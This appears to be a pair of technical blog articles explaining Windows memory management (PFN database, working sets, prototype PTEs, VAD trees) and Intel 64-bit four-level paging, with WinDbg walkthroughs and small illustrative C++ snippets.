Here we can see that WinDbg also indicates that the PFN entry is at 0xfffffa8012f61710, just like our calculation, so it looks like we did that correctly.

An interlude about working sets

Phew - we've done some digging around in the PFN database now, and we've seen how each entry in that database stores some information about the physical page itself. Let's take a step back for a moment, back into the world of virtual memory, and talk about working sets.

Each process has what's called a working set, which represents all of the process' virtual memory that is subject to paging and is accessible without incurring a page fault. Some parts of the process' memory may be paged to disk in order to free up RAM, or in a transition state, and therefore accessing those regions of memory will generate a page fault within that process. In layman's terms, a page fault is essentially the architecture indicating that it can't access the specified virtual memory, because the PTEs needed for translation weren't found inside the paging structures, or because the permissions on the PTEs restrict what the application is attempting to do. When a page fault occurs, the page fault handler must resolve it by adding the page back into the process' working set (meaning it also gets added back into the process' paging structures), mapping the page back into memory from disk and then adding it back to the working set, or indicating that the page being accessed is invalid.

Figure 7: An example working set of a process, where some rarely accessed pages were paged out to disk to free up physical memory.

It should be noted that other regions of virtual memory may be accessible to the process which do not appear in the working set, such as Address Windowing Extensions (AWE) mappings or large pages; however, for the purposes of this article we will be focusing on memory that is part of the working set.

Occasionally, Windows will trim the working set of a process in response to (or to avoid) memory pressure on the system, ensuring there is memory available for other processes.

If the working set of a process is trimmed, the pages being trimmed have their backing PTEs marked as β€œnot valid” and are put into a transition state while they await being paged to disk or given away to another process. In the case of a β€œsoft” page fault, the page described by the PTE is actually still resident in physical memory, and the page fault handler can simply mark the PTE as valid again and resolve the fault efficiently. Otherwise, in the case of a β€œhard” page fault, the page fault handler needs to fetch the contents of the page from the paging file on disk before marking the PTE as valid again. If this kind of fault occurs, the page fault handler will likely also have to alter the page frame number that the PTE refers to, since the page isn't likely to be loaded back into the same location in physical memory that it previously resided in.

Sharing is caring

It's important to remember that while two processes do have different paging structures that map their virtual memory to different parts of physical memory, there can be portions of their virtual memory which map to the same physical memory. This concept is called shared memory, and it's actually quite common within Windows. In fact, even in our previous example with notepad.exe's entry point, the page of memory we looked at was shared. Examples of regions in memory that are shared are system modules, shared libraries, and files that are mapped into memory with CreateFileMapping() and MapViewOfFile().

In addition, the kernel-mode portion of a process' memory will also point to the same shared physical memory as other processes, because a shared view of the kernel is typically mapped into every process. Despite the fact that a view of the kernel is mapped into their memory, user-mode applications will not be able to access pages of kernel-mode memory, because Windows leaves the User/Supervisor bit clear in the kernel-mode PTEs. The hardware uses this bit to enforce ring0-only access to those pages.

Figure 8: Two processes may have different views of their user space virtual memory, but they get a shared view of the kernel space virtual memory.

In the case of memory that is not shared between processes, the PFN database entry for that page of memory will point to the appropriate PTE in the process that owns that memory.

Figure 9: When not sharing memory, each process will have a PTE for a given page, and that PTE will point to a unique member of the PFN database.

When dealing with memory that is shareable, Windows creates a kind of global PTE - known as a prototype PTE - for each page of the shared memory. This prototype always represents the real state of the physical memory for the shared page. If marked as Valid, this prototype PTE can act as a hardware PTE just as in any other case. If marked as Not Valid, the prototype will indicate to the page fault handler that the memory needs to be paged back in from disk. When a prototype PTE exists for a given page of memory, the PFN database entry for that page will always point to the prototype PTE.

Figure 10: Even though both processes still have a valid PTE pointing to their shared memory, Windows has created a prototype PTE which points to the PFN entry, and the PFN entry now points to the prototype PTE instead of a specific process.

Why would Windows create this special PTE for shared memory? Well, imagine for a moment that in one of the processes, the PTE that describes a shared memory location is stripped out of the process' working set. If the process then tries to access that memory, the page fault handler sees that the PTE has been marked as Not Valid, but it has no idea whether that shared page is still resident in physical memory or not.

For this, it uses the prototype PTE. When the PTE for the shared page within the process is marked as Not Valid, the Prototype bit is also set and the page frame number is set to the location of the prototype PTE for that page.

Figure 11: One of the processes no longer has a valid PTE for the shared memory, so Windows instead uses the prototype PTE to ascertain the true state of the physical page.

This way, the page fault handler is able to examine the prototype PTE to see if the physical page is still valid and resident or not. If it is still resident, then the page fault handler can simply mark the process' version of the PTE as valid again, resolving the soft fault. If the prototype PTE indicates it is Not Valid, then the page fault handler must fetch the page from disk.

We can continue our adventures in WinDbg to explore this further, as it can be a tricky concept. Based on what we know about shared memory, that should mean that the PTE referenced by the PFN entry for the entry point of notepad.exe is a prototype PTE. We can already see that it's a different address (0xfffff8a0`09e25a00) than the PTE that we were expecting from the !pte command (0xfffff680007fea98). Let's look at the fully expanded nt!_MMPTE structure that's being referenced in the PFN entry.


We can compare that with the nt!_MMPTE entry that was referenced when we did the !pte command on notepad.exe's entry point.


It looks like the Prototype bit is not set on either of them, and they're both valid. This makes perfect sense. The shared page still belongs to notepad.exe's working set, so the PTE in the process' paging structures is still valid; however, the operating system has proactively allocated a prototype PTE for it because the memory may be shared at some point and the state of the page will need to be tracked with the prototype PTE. The notepad.exe paging structures also point to a valid hardware PTE, just not the same one as the PFN database entry.

The same isn't true for a region of memory that can't be shared. For example, if we choose another memory location that was allocated as MEM_PRIVATE, we will not see the same results. We can use the !vad command to give us all of the virtual address regions (listed by virtual page frame) that are mapped by the current process.


We can take a look at a MEM_PRIVATE page, such as 0x1cf0, and see if the PTE from the process' paging structures matches the PTE from the PFN database.


As we can see, it does match, with both addresses referring to 0xfffff680`0000e780. Because this memory is not shareable, the process' paging structures are able to manage the hardware PTE directly. In the case of shareable pages allocated with MEM_MAPPED, though, the PFN database maintains its own copy of the PTE.

It's worth exploring different regions of memory this way, just to see how the paging structures and PFN entries are set up in different cases. As mentioned above, the VAD tree is another important consideration when dealing with user-mode memory as in many cases, it will actually be a VAD node which indicates where the prototype PTE for a given shared memory region resides. In these cases, the page fault handler will need to refer to the process' VAD tree and walk the tree until it finds the node responsible for the shared memory region.

Figure 12: If the invalid PTE points to the process' VAD tree, a VAD walk must be performed to locate the appropriate _MMVAD node that represents the given virtual memory.

The FirstPrototypePte member of the VAD node will indicate the starting virtual address of a region of memory that contains prototype PTEs for each shared page in the region. The list of prototype PTEs is terminated with the LastContiguousPte member of the VAD node. The page fault handler must then walk this list of prototype PTEs to find the PTE that backs the specific page that has faulted.

Figure 13: The FirstPrototypePte member of the VAD node points to a region of memory that has a contiguous block of prototype PTEs that represent shared memory within that virtual address range.
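To make the walk concrete, here is a minimal sketch of how the prototype PTE for a faulting page could be located from the owning VAD node; the structure below is a simplification with illustrative field names, not the real nt!_MMVAD layout:

#include <cstdint>

struct VadNodeSketch
{
    uint64_t StartingVpn;        // first virtual page number covered by this node
    uint64_t EndingVpn;          // last virtual page number covered by this node
    uint8_t* FirstPrototypePte;  // start of the contiguous prototype PTE block
    uint8_t* LastContiguousPte;  // last prototype PTE in that block
};

// 4KB pages assumed; pteSize is sizeof(nt!_MMPTE) on the target build.
uint8_t* LocatePrototypePte(const VadNodeSketch& vad, uint64_t faultingVa, uint64_t pteSize)
{
    uint64_t index = (faultingVa >> 12) - vad.StartingVpn; // pages into the region
    return vad.FirstPrototypePte + index * pteSize;
}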

One more example to bring it all together

It would be helpful to walk through each of these scenarios with a program that we control, and that we can change, if needed. That's precisely what we're going to do with the memdemo project. You can follow along by compiling the application yourself, or you can simply take a look at the code snippets that will be posted throughout this example.

To start off, we'll load our memdemo.exe and then attach the kernel debugger. We then need to get a list of processes that are currently running on the system.


Let's quickly switch back to the application so that we can let it create our initial buffer. To do this, we're simply allocating some memory and then accessing it to make sure it's resident.
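A minimal sketch of this step, which may differ from the actual memdemo code, looks something like this: commit a page with read/write permissions, touch it so it becomes resident, and print its address for the debugger.

#include <windows.h>
#include <cstdio>

int main()
{
    unsigned char* buffer = static_cast<unsigned char*>(
        VirtualAlloc(nullptr, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE));
    if (!buffer)
        return 1;

    buffer[0] = 0xff;                    // access (and dirty) the page so it's paged in
    printf("buffer at %p\n", buffer);
    getchar();                           // pause so we can break in with the kernel debugger
    return 0;
}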


Upon running the code, we see that the application has created a buffer for us (in the current example) at 0x000001fe`151c0000. Your buffer may differ.

We should hop back into our debugger now and check out that memory address. As mentioned before, it's important to remember to switch back into the process context of memdemo.exe when we break back in with the debugger. We have no idea what context we could have been in when we interrupted execution, so it's important to always do this step.


When we wrote memdemo.exe, we could have used the __debugbreak() compiler intrinsic to avoid having to constantly switch back to our process' context. It would ensure that when the breakpoint was hit, we were already in the correct context. For the purposes of this article, though, it's best to practice swapping back into the correct process context, as during most live analysis we would not have the liberty of throwing int3 exceptions during the program's execution.

We can now check out the memory at 0x000001fe`151c0000 using the db command.


Looks like that was a success - we can even see the 0xff byte that we wrote to it. Let's have a look at the backing PTE for this page using the !pte command.


That's good news. It seems like the Valid (V) bit is set, which is what we expect. The memory is Writeable (W), as well, which makes sense based on our PAGE_READWRITE permissions. Let's look at the PFN database entry using !pfn for page 0xa1dd0.


We can see that the PFN entry points to the same PTE structure we were just looking at. We can go to the address of the PTE at 0xffffed00ff0a8e00 and cast it as an nt!_MMPTE.


We see that it's Valid, Dirty, Accessed, and Writeable, which are all things that we expect. The Accessed bit is set by the hardware when the page table entry is used for translation. If that bit is set, it means that at some point the memory has been accessed because the PTE was used as part of an address translation. Software can reset this value in order to track accesses to certain memory. Similarly, the Dirty bit shows that the memory has been written to, and is also set by the hardware. We see that it's set for us because we wrote our 0xff byte to the page.

Now let's let the application execute using the g command. We're going to let the program page out the memory that we were just looking at, using the following code:
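One common way to do this is to trim the process' working set; whether memdemo uses exactly this API is an assumption, but a sketch using SetProcessWorkingSetSize would look like:

#include <windows.h>

// Passing (SIZE_T)-1 for both limits asks Windows to remove as many pages as
// possible from the current process' working set.
void TrimWorkingSet()
{
    SetProcessWorkingSetSize(GetCurrentProcess(), (SIZE_T)-1, (SIZE_T)-1);
}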


Once that's complete, don't forget to switch back to the process context again. We need to do that every time we go back into the debugger! Now let's check out the PTE with the !pte command after the page has been supposedly trimmed from our working set.


We see now that the PTE is no longer valid, because the page has been trimmed from our working set; however, it has not been paged out of RAM yet. This means it is in a transition state, as shown by WinDbg. We can verify this for ourselves by looking at the actual PTE structure again.


In the _MMPTE_TRANSITION version of the structure, the Transition bit is set. So because the memory hasn't yet been paged out, if our program were to access that memory, it would cause a soft page fault that would then simply mark the PTE as valid again. If we examine the PFN entry with !pfn, we can see that the page is still resident in physical memory for now, and still points to our original PTE.


Now let's press g again and let the app continue. It'll create a shared section of memory for us. In order to do so, we need to create a file mapping and then map a view of that file into our process.
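A minimal sketch of that sequence could look like the following; the section name and the pagefile-backed mapping via INVALID_HANDLE_VALUE are assumptions, not necessarily what memdemo does:

#include <windows.h>

void* CreateSharedBuffer()
{
    // Back the section with the paging file rather than a real file on disk.
    HANDLE section = CreateFileMappingW(INVALID_HANDLE_VALUE, nullptr,
                                        PAGE_READWRITE, 0, 0x1000, L"MemDemoSection");
    if (!section)
        return nullptr;

    void* view = MapViewOfFile(section, FILE_MAP_ALL_ACCESS, 0, 0, 0x1000);
    if (view)
        static_cast<unsigned char*>(view)[0] = 0xff; // touch it, as in the example
    return view;
}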


Let's take a look at the shared memory (at 0x000001fe`151d0000 in this example) using db. Don't forget to change back to our process context when you switch back into the debugger.


And look! There's the 0xff that we wrote to this memory region as well. We're going to follow the same steps that we did with the previous allocation, but first let's take a quick look at our process' VAD tree with the !vad command.


You can see the first allocation we did, starting at virtual page number 0x1fe151c0. It's a Private region that has the PAGE_READWRITE permissions applied to it. You can also see the shared section allocated at VPN 0x1fe151d0. It has the same permissions as the non-shared region; however, you can see that it's Mapped rather than Private.

Let's take a look at the PTE information that's backing our shared memory.


This region, too, is Valid and Writeable, just like we'd expect. Now let's take a look at the !pfn.


We see that the Share Count now actually shows us how many times the page has been shared, and the page also has the Shared property. In addition, we see that the PTE address referenced by the PFN entry is not the same as the PTE that we got from the !pte command. That's because the PFN database entry is referencing a prototype PTE, while the PTE within our process is acting as a hardware PTE because the memory is still valid and mapped in.

Let's take a look at the PTE structure that's in our process' paging structures, that was originally found with the !pte command.


We can see that it's Valid, so it will be used by the hardware for address translation. Let's see what we find when we take a look at the prototype PTE being referenced by the PFN entry.


This PTE is also valid, because it's representing the true state of the physical page. Something interesting to note, though, is that you can see that the Dirty bit is not set. Because this bit is only set by the hardware in the context of whatever process is doing the writing, you can theoretically use this bit to actually detect which process on a system wrote to a shared memory region.

Now let's run the app more and let it page out the shared memory using the same technique we used with the private memory. Here's what the code looks like:


Let's take a look at the memory with db now.


We see now that it's no longer visible in our process. If we do !pte on it, let's see what we get.


The PTE that's backing our page is no longer valid. We still get an indication of what the page permissions were, but the PTE now tells us to refer to the process' VAD tree in order to get access to the prototype PTE that contains the real state. If you recall from when we used the !vad command earlier in our example, the address of the VAD node for our shared memory is 0xffffa50d`d2313a20. Let's take a look at that memory location as an nt!_MMVAD structure.


The FirstPrototypePte member contains a pointer to a location in virtual memory that stores contiguous prototype PTEs for the region of memory represented by this VAD node. Since we only allocated (and subsequently paged out) one page, there's only one prototype PTE in this list. The LastContiguousPte member shows that our prototype PTE is both the first and last element in the list. Let's take a look at this prototype PTE as an nt!_MMPTE structure.


We can see that the prototype indicates that the memory is no longer valid. So what can we do to force this page back into memory? We access it, of course. Let's let the app run one more step so that it can try to access this memory again.


Remember to switch back into the context of the process after the application has executed the next step, and then take a look at the PTE from the PFN entry again.


Looks like it's back, just like we expected!

Exhausted yet? Compared to the 64-bit paging scheme we talked about in our last article, Windows memory management is significantly more complex and involves a lot of moving parts. But at its core, it's not too daunting. Hopefully, now with a much stronger grasp of how things work under the hood, we can put our memory management knowledge to use in something practical in a future article.

If you're interested in getting your hands on the code used in this article, you can check it out on GitHub and experiment on your own with it.


Further reading and attributions

Consider picking up a copy of "Windows Internals, 7th Edition" or "What Makes It Page?" to get an even deeper dive on the Windows virtual memory manager.

Thank you to Alex Ionescu for additional tips and clarification. Thanks to irqlnotdispatchlevel for pointing out an address miscalculation.

Introduction to IA-32e hardware paging

8 July 2017 at 02:51
In this article, we explore the complexities and concepts behind Intel's 64-bit paging scheme, why we need paging in the first place, and some practical analysis of paging structures.

Why do we need paging?

In any application, whether it's a student's first program or a complicated operating system, instructions executed by the computer that involve memory use a virtual address. In fact, even when the CPU fetches the next instruction to execute, it uses a virtual address. A virtual address represents a specific location in the application's view of memory; however, it does not represent a location within physical RAM. Paging, or linear address translation, is the mechanism that converts a linear address accessible by the CPU to a physical address that the memory management unit (MMU) can use to access physical memory.

Technically, a linear address and a virtual address are not the same. For the purposes of this article, though, we will consider them to be the same, since we do not need to consider segmentation. Older architectures would first need to convert a virtual address to a linear address using segmentation.



Figure 1: An application with different parts of virtual memory mapping to different parts of physical memory.

Paging modes

In this article, we will focus on IA-32e 4-level paging (64-bit paging) on Intel architectures. It is worth noting, though, that there are other paging modes supported by Intel.

There are three mechanisms which control paging and the currently enabled paging mode. The first is the PG flag (bit 31) in control register 0 (CR0). If this bit is set, paging is enabled on the processor. If this bit is not set, no paging is enabled. In the latter case, the virtual address and physical address are considered equivalent and no translation is necessary.

If paging is enabled on the processor, then control register 4 (CR4) is checked for the Physical Address Extension (PAE) bit (bit 5) being set. If it is not, then 32-bit paging is used. If it is set, then the final condition that is checked is the Extended Feature Enable Register, or IA32_EFER MSR. If the Long Mode Enable (LME) bit (bit 8) of this register is not set, the processor is in PAE 36-bit paging mode. If the LME bit is set, the processor is in 4-level paging mode, which is the 64-bit mode that we plan to explore in this article. This mode translates 48-bit virtual addresses into 52-bit physical addresses, though because the virtual addresses are limited to 48-bits, the maximum addressable space is limited to 256TB.

Paging structures

Regardless of which paging mode is enabled, a series of paging structures are used to facilitate the translation from a virtual address to a physical address. The format and depth of these paging structures will depend on the paging mode chosen. Generally speaking, each entry in the paging structure is the size of a pointer and contains a series of control bits, as well as a page frame number.

In our case, 64-bit mode structures are 4,096 bytes in size (the size of the smallest architecture page - we will touch more on that later), containing 512 entries each. Every entry is 8 bytes.



Figure 2: A paging structure containing 512 pointer-size entries in 64-bit mode.

The first paging structure is always located at the physical address specified in control register 3 (CR3). As an aside, this is also the only place that stores the fully qualified physical address to a paging structure - in all other cases, we need to multiply a page frame number by the size of a page to get the real physical address. Each entry within the paging structure will contain a page frame number which either references a child paging structure for that region of memory, or maps directly to a page of physical memory that the original virtual address translates to. Again, in both cases, the page frame number is simply an index of a physical page in memory, and needs to be multiplied by the size of a page to get a meaningful physical address. Each paging structure entry also describes the different memory access protections that are applied to the memory region they describe - whether the code is writable, executable, etc - as well as some more interesting properties such as whether or not that specific structure has previously been used for a translation.

While the nested paging structures are being walked, the translation can be considered complete either by identifying a page frame at the lowest level of paging structure or by an early termination caused by the configuration of a paging structure. For example, if a paging structure is marked as not present (bit 0 of the structure is not set) or if a reserved bit is set, the translation fails and the virtual address is considered invalid. Additionally, a paging structure can set its Page Size bit to indicate that it is the lowest paging structure for that region of memory, which we will touch more on later.



Figure 3: Some paging structures may not map to a physical page because the virtual address range they represent is invalid.

Anatomy of a virtual address

Information is encoded in a virtual address that makes the translation to a physical address possible. In 64-bit mode, we use 4-level paging, which means that any given virtual address can be divided into 6 sections with 4 of them associated with the different paging structures.

The different paging structures are as follows: a PML4 table (located in CR3), a Page Directory Pointer Table (PDPT), a Page Directory (PD), and a Page Table (PT). The figure below illustrates which bits of a given virtual address map to these different paging structures.

A single entry in the PML4 table (a PML4E) can address up to 512GB of memory, while an entry in the PDPT (a PDPTE) can address 1GB (parent granularity divided by 512) of memory, and so on. This is how we get the granularity of the paging structures down to 4KB at the lowest level.



Figure 4: The anatomy of a virtual address in 64-bit mode.

In the example above, we see that the highest bits (bits 63-48) are reserved. We will talk more about these bits in a future article, but for the purposes of address translation they are not used.

The next 9 bits (bits 47-39) are used to identify the index into the PML4 table that contains the entry (PML4E) that's next in our paging structure walk. For example, if these 9 bits evaluate to the number 16, then the 16th entry in the table (PML4[15]) is selected to be used for the address translation.
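The same trick applies at every level, so the whole decomposition of a 48-bit virtual address can be sketched with a few shifts and masks:

#include <cstdint>

struct VaIndexes { uint64_t Pml4, Pdpt, Pd, Pt, Offset; };

VaIndexes SplitVirtualAddress(uint64_t va)
{
    VaIndexes idx;
    idx.Pml4   = (va >> 39) & 0x1FF; // bits 47-39: index into the PML4 table
    idx.Pdpt   = (va >> 30) & 0x1FF; // bits 38-30: index into the PDPT
    idx.Pd     = (va >> 21) & 0x1FF; // bits 29-21: index into the Page Directory
    idx.Pt     = (va >> 12) & 0x1FF; // bits 20-12: index into the Page Table
    idx.Offset = va & 0xFFF;         // bits 11-0:  offset into the final 4KB page
    return idx;
}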

Once we have the PML4E entry from the given index, we can use that entry to provide us the address of the start of the next paging structure to walk to. Here is an example of what a PML4E structure would look like in C++.
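The listing below is a plausible sketch of such a definition; the bit positions follow the Intel layout described here, but the field names are illustrative rather than Microsoft's own, and the PDPTE, PDE and PTE entries further down share the same general shape:

#include <cstdint>

typedef union _PML4E
{
    struct
    {
        uint64_t Present          : 1;  // must be 1 for the entry to be valid
        uint64_t ReadWrite        : 1;  // 0 = read-only, 1 = writeable
        uint64_t UserSupervisor   : 1;  // 0 = supervisor (ring 0) access only
        uint64_t PageWriteThrough : 1;
        uint64_t PageCacheDisable : 1;
        uint64_t Accessed         : 1;  // set by hardware when used for a translation
        uint64_t Ignored1         : 1;
        uint64_t PageSize         : 1;  // must be 0 in a PML4E
        uint64_t Ignored2         : 4;
        uint64_t PageFrameNumber  : 36; // PFN of the PDPT this entry points to
        uint64_t Reserved         : 4;
        uint64_t Ignored3         : 11;
        uint64_t ExecuteDisable   : 1;  // if set, instruction fetches are disallowed
    };
    uint64_t Value;
} PML4E, *PPML4E;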


Using the page frame number (PFN) member of the structure (in this case, it actually refers to the page frame where the next structure is located), we can now walk to the next structure in the hierarchy by multiplying that number by the size of a page (0x1000). The result of that multiplication is the physical address where the next paging structure is located. The PML4E points to a Page Directory Pointer Table (PDPT). We use the next 9 bits of our original virtual address (bits 38-30) to determine the index in the PDPT that we want to look at. At that index, we will find a PDPTE structure, like the one defined below.


It's worth noting at this point that paging structures other than those in the PML4 table contain a Page Size (PS) bit (bit 7). If this bit is set, then the current entry represents the physical page. This means that page sizes as large as 1GB can be supported, if the associated PDPTE indicates that it is a 1GB page by setting the PS bit. Otherwise, 2MB pages can be supported if the PS bit is set in the PDE structure. Not all processors support the PS bit being set in a PDPTE; therefore, not all processors will support 1GB pages.

Moving along in our example, we can assume that the PS bit is not set in the PDPTE that we just referenced. So, we will look at the page frame number of this structure and multiply by the page size again to get the physical address of the next paging structure root.



Figure 5: Our walk so far, from the CR3 register, through the PML4 and PDPT structures.

Using the PFN stored in the PDPTE structure, we're able to locate the Page Directory paging structure, which is next in the hierarchy. As before, we use the next 9 bits (bits 29-21) of the original virtual address to get the index into this structure where our entry of interest (a PDE, in this case) resides. The PDE structure is defined similarly to the previous structures, as shown below.


Again, we can use the PFN member of this structure multiplied by the size of a page to locate the next, and final, paging structure that facilitates the translation - the Page Table. The next 9 bits (bits 20-12) of our original virtual address are the index into the Page Table where the associated entry (PTE) is located. This PTE structure is defined below, and once again has similar characteristics to its predecessors.


The PFN member of this structure indicates the real page frame of the backing physical memory. Because our example went the full depth of the paging structures, the size of a page frame is 4KB, or 0x1000. Thus, in order to get the location in physical memory where the backing page begins, we multiply the page frame number from the PTE by 0x1000 as we had been doing previously. The remaining 12 bits (bits 11-0) of the original virtual address are the offset into the physical page where the actual data resides. Had our example not used the full depth of the paging structures, and had instead used 2MB page sizes (stopping at the Page Directory level), that PDE would have contained the page frame number of interest, and we would have multiplied that number by the size of a page frame, which in that case would be 2MB or 0x200000. We would then add the offset into the page, which would be the remaining bits (bits 20-0) of the original virtual address since we did not need to use the usual 9 bits for indexing into a Page Table structure.



Figure 6: Here we have a full traversal of the paging structures from CR3 all the way to the final PTE. We use the PFN from the PTE to calculate the backing physical page.

Practical exploration with WinDbg

We can use WinDbg to explore what this structure hierarchy looks like in practice. Windows does some things differently (such as per-process CR3 to keep the virtual address spaces of processes separate) and there are certain complexities that we will cover in a future article, but we will choose a simple example that demonstrates what we've just learned.

Attach an instance of WinDbg as a kernel debugger to the virtual machine or physical box of your choice to get started. Check out this article for instructions on how to do so.

Once we've broken in, use the lm command to list the modules that have been loaded by the current process.


We'll use the image base of ntdll.dll as our example. It's located at 0x00000000`771d0000. We can view the memory at that virtual address by using db (or dX, where X is your desired format specifier).


Here we can see the signature 'MZ' as we would expect from a DOS header. But where are these bytes located in physical memory? There are two ways we can find out.

The first way is the hard way - we can get the value stored in CR3 which gives us the beginning of our PML4 paging structure, and begin our manual walk like we described above.


This means that the start of our PML4 table is located at physical address 0x187000. We can take a look at the physical memory at that location using !dq (or !dX, again where X is the format specifier you want to use). We're aligning on a quad-word because the size of each entry in any paging structure in 64-bit mode is 8 bytes.


Here we see that we have one PML4E structure, with 0x00700007`ddc82867 as the value. For a paging structure entry, we know that bits 47-12 represent the page frame number of the next paging structure. So we extract those bits to get 0x7ddc82, then multiply it by the size of a page frame on this architecture (4KB) to get a physical address of 0x00000007`ddc82000.
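That extraction is just a shift and a mask over the raw entry, which we can sketch like so:

#include <cstdint>

uint64_t pml4e = 0x00700007ddc82867ULL;           // the PML4E value dumped above
uint64_t pfn   = (pml4e >> 12) & 0xFFFFFFFFFULL;  // bits 47-12 -> 0x7ddc82
uint64_t pdpt  = pfn * 0x1000;                    // 0x00000007`ddc82000, the PDPT's physical address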

If we navigate to that physical address, let's see what we get.


Sure enough, there are two PDPTE entries (or potentially more, off-screen, since there can be up to 512 listed) here in this PDPT that we've walked to. In order to figure out which PDPTE we need to reference, we'd need to refer to the 9 bits in the original virtual address that map to the PDPT (bits 39-30), which in the case of our example works out to 0x1. That means we want the second entry of the PDPT structure, at index 1.

We can extract the page frame number from that PDPTE entry using the same bits we used in the last example (bits 47-12), resulting in 0x7d96b8. Let's multiply that number by 4KB, and see what we've got at that physical address.

You may be wondering at this point: what's going on? Why is there nothing in the PD structure that was referenced by our PDPTE? Remember, not all memory is valid and mapped, so the fact that we are seeing a bunch of zero-value PDE entries isn't a surprise. It just means that those regions of virtual memory aren't currently mapped to a physical page. In order to get to the PDE we care about, we need to take the next 9 bits of the original virtual address as we did before, this time getting a value of 0x1b8 after extracting the bits. That will get us the index into the PD structure where our PDE of interest is located. We can navigate to that memory location now, remembering to multiply the index by the size of a paging structure entry, which is 8 bytes.

That gets us 0x67e00007`d96b9867 as our PDE value. Once again, we extract the bits that are relevant to the page frame number, and we come up with 0x7d96b9.

We can repeat the steps we've taken previously to multiply that page frame number by 4KB, add the PT index using the next 9 bits of the original virtual address (0x1d0 in this case), then navigate to the correct physical address.

We've gotten the value 0xe7d00007`d9cc0025 for our PTE entry. We're almost there! We just need to do the same steps we've been doing one more time - extract the PFN from that value (0x7d9cc0), multiply by the size of a page (0x1000), but this time, we need to add the page offset (bits 11-0) from our original virtual address to the result. This should get us to 0x00000007`d9cc0000 since our page offset in this example was actually zero. Let's look at the memory!



There's the header, just like we expected. That's a cumbersome amount of work, though, and we don't want to have to be doing that manually every time we try to translate an address. Luckily, there's an easier way.

WinDbg provides the !pte command to illustrate the entire walk down the paging structures and what each entry contains. It is important to note, though, that the addresses of the paging structures are converted to virtual addresses before being displayed, so they will look different from the physical addresses we extrapolated on our own, but they point to the same memory.


You can see that WinDbg gives us the address of the paging structure used, what it contained, and the page frame number for each. You can verify that the PFN on the PXE (PML4E) entry matches up with what we calculated, too. The most important part of all of this information is the PFN that's within the lowermost entry, the PTE. In our case it's 0x7d9cc0.

So, we can multiply that page frame number by 0x1000 to get 0x00000007`d9cc0000, and that should be the physical address of the DOS header of ntdll.dll! This checks out based on the manual calculations we did previously, but let's take a look again to make sure.


And there it is! We can test this by editing the DOS header in WinDbg and seeing if those changes are reflected on the physical page.


Let's check it out using the virtual address...


...and the physical address...


And there you have it! We now know how to successfully walk the IA-32e paging structures to convert a virtual address into a physical address.
